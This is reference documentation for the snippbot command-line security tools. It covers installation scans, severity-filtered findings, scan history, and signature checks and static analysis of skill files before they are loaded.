security / skills
Two related command groups:
snippbot security— run scans of your Snippbot installation, review findings, and browse scan history.snippbot skills— verify the signature of and statically analyze individual skill files before loading them.
Overview
Section titled “Overview”# security groupsnippbot security scan # Run a full scansnippbot security scan --quick # Critical checks onlysnippbot security report # Show the latest scansnippbot security findings # List findings (filterable)snippbot security history # List recent scans
# skills groupsnippbot skills verify <path> # Verify signature + static scansnippbot skills scan <path> # Static analysis onlysnippbot security scan
Section titled “snippbot security scan”Runs security checks (credential exposure, file permissions, database integrity, etc.) and produces a health score out of 100.
snippbot security scan # Full scansnippbot security scan --quick # Critical checks onlysnippbot security scan --json-output # Machine-readable| Option | Description |
|---|---|
--quick | Critical checks only — finishes in < 1s |
--json-output | Emit structured JSON |
Sample output:
┌─ Security Scan Results ─┐│ Health Score: 85/100 │└─────────────────────────┘ ✓ Credential Exposure ✓ File Permissions ⚠ Database Integrity (2 findings)
Run `snippbot security findings` to see details.snippbot security report
Section titled “snippbot security report”Show the latest scan report, or a specific one by ID.
snippbot security reportsnippbot security report --scan-id abc123snippbot security report --json-outputsnippbot security findings
Section titled “snippbot security findings”List individual findings across all scans. Filter by severity, category, or limit.
snippbot security findings # Latest 50snippbot security findings -s critical # Critical onlysnippbot security findings -c credential_exposuresnippbot security findings -n 100| Option | Values | Description |
|---|---|---|
-s, --severity | critical, high, medium, low | Filter by severity |
-c, --category | (string) | Filter by check category |
-n, --limit | int (default 50) | Max findings to display |
snippbot security history
Section titled “snippbot security history”Browse recent scans.
snippbot security history # Last 10snippbot security history -n 25snippbot skills verify
Section titled “snippbot skills verify”Verify a skill file’s signature and run static analysis. Use before loading untrusted skills.
snippbot skills verify ./my_skill.pysnippbot skills verify ./my_skill.py --public-key <hex>If a my_skill.manifest.json sidecar exists, it is loaded automatically. Supply --public-key (hex-encoded Ed25519) to check a detached signature.
snippbot skills scan
Section titled “snippbot skills scan”Static analysis only — no signature check. Useful for triage before a skill has been signed.
snippbot skills scan ./my_skill.pysnippbot skills scan ./my_skill.py --json-outputFlags dangerous patterns (e.g. eval, subprocess execution, network calls) with severities aligned to snippbot security findings.
